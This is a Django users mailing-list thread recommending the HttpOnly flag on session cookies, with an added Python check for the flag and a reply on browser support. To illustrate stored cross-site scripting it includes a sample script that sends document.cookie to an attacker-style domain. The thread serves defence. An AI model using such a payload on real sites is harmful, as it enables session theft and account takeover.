Cookie Tip


cootetom

Jan 25, 2010, 3:00:22 PM
to Django users
Hi all,

A little tip when using cookies for django sessions and
authentication. By default, django will create a session cookie and
send it to the client which contains the unique identifier for the
current user's session. This session ID is used to keep the user logged
in between page requests and to retrieve session saved data back on
the server to use in your python code. However, using JavaScript you
can easily see and read this cookie from the document.cookie variable.
This means that if by some unfortunate circumstance there is an HTML
injection vulnerability on your django powered web site then cookies
can be stolen using JavaScript by sending the cookie data to another
domain.

I must say at this point that the django framework already makes it
extremely difficult to have an HTML injection vulnerability due to the
way it escapes template data by default. However, developers who don't
necessarily understand it or have just been coding without checking
for these things may well allow HTML/JavaScript to be injected on a
web page where they did not mean to.

HTML injection works like this:
1. Mr Hacker Dude visits your web site and posts a message in a comment
area somewhere.
2. The message contains a script such as the following:
<script>location.href='http://mybadhackersite.com/?cookie='+document.cookie;</script>
3. Later on, Mr Normal User logs on to your web site and reads the
message that Mr Hacker Dude posted.
4. The script is run on the page and Mr Normal User's session cookie is
sent to Mr Hacker Dude.
5. Mr Hacker Dude visits the web site and sends the stolen session
cookie in his first request to the web site.
6. Mr Hacker Dude is now logged in as Mr Normal User.

Like I've said previously, django's templating engine will prevent the
script from Mr Hacker Dude being run by default anyway but in some
circumstances this default behaviour may have been overwritten for
some reason. So ideally we would like to prevent JavaScript from being
able to read our session cookie, thus making it much harder for this
type of attack to happen.

The tip here is to add the following to your settings.py file:

SESSION_COOKIE_PATH = '/;HttpOnly'

If your cookie path is anything other than "/" then just add
";HttpOnly" to the end of whatever it is. This helps prevent the cookie
from being read by the client and in JavaScript. It does not prevent
the cookie from being read entirely but certainly helps against HTML
injection being used to steal cookie data.

You can test this yourself. Start your django powered web site, log
in and type the following into the web browser's address bar:
javascript:alert(document.cookie); You should see your session cookie
in the alert. Now append the ";HttpOnly" string to your path in
settings.py, re-start your web site and do the same alert. The cookie
will not be read by JavaScript this time around.

I hope this has been interesting and helpful.

Regards,
- Tom Coote
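An added example (my own code, not from the thread or from Django) showing why the path trick works and giving a server-side check for the flag: a cookie library copies the Path attribute into the Set-Cookie header verbatim, so ";HttpOnly" smuggled into the path ends up as an extra attribute. The cookie name "sessionid" and the session values are constructed for illustration.

```python
# Added example, not code from the thread: render the Set-Cookie header a
# cookie library produces for a session cookie and check it for HttpOnly.
# Cookie name 'sessionid' and the session values are constructed.
from http.cookies import SimpleCookie


def session_set_cookie(session_id, path='/', httponly=False):
    """Return the Set-Cookie header value for a session cookie.

    The Path attribute is written into the header verbatim, which is why
    SESSION_COOKIE_PATH = '/;HttpOnly' from the thread works at all.
    httponly=True uses the real HttpOnly flag instead of the path trick.
    """
    cookie = SimpleCookie()
    cookie['sessionid'] = session_id
    cookie['sessionid']['path'] = path
    if httponly:
        cookie['sessionid']['httponly'] = True
    return cookie['sessionid'].OutputString()


def has_httponly(set_cookie_value):
    """True if a Set-Cookie header value carries the HttpOnly attribute.

    Attributes follow the name=value pair, separated by ';'. Browsers
    match the attribute name case-insensitively and ignore surrounding
    whitespace, so 'Path=/;HttpOnly' and 'Path=/; HttpOnly' are alike.
    """
    attributes = set_cookie_value.split(';')[1:]
    return any(attr.strip().lower() == 'httponly' for attr in attributes)


if __name__ == '__main__':
    # Plain path, the path trick from the thread, and the proper flag.
    for header in (session_set_cookie('abc123'),
                   session_set_cookie('abc123', path='/;HttpOnly'),
                   session_set_cookie('abc123', httponly=True)):
        print('%-40s HttpOnly=%s' % (header, has_httponly(header)))
```

Django later gained a SESSION_COOKIE_HTTPONLY setting, so the path trick is only needed on versions that predate it; has_httponly can be run over the Set-Cookie headers of a real login response to confirm either route took effect.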

Malcolm Box

Jan 26, 2010, 4:43:05 AM
to django...@googlegroups.com
Hi,

On Mon, Jan 25, 2010 at 8:00 PM, cootetom <coot...@gmail.com> wrote:
The tip here is to add the following to your settings.py file

SESSION_COOKIE_PATH = '/;HttpOnly'


Useful information - however be warned this isn't a panacea. See http://www.owasp.org/index.php/HTTPOnly#Browsers_Supporting_HTTPOnly for which browsers and which attacks this prevents.

Even so, it adds another layer of security and that's a good thing.

Cheers,

Malcolm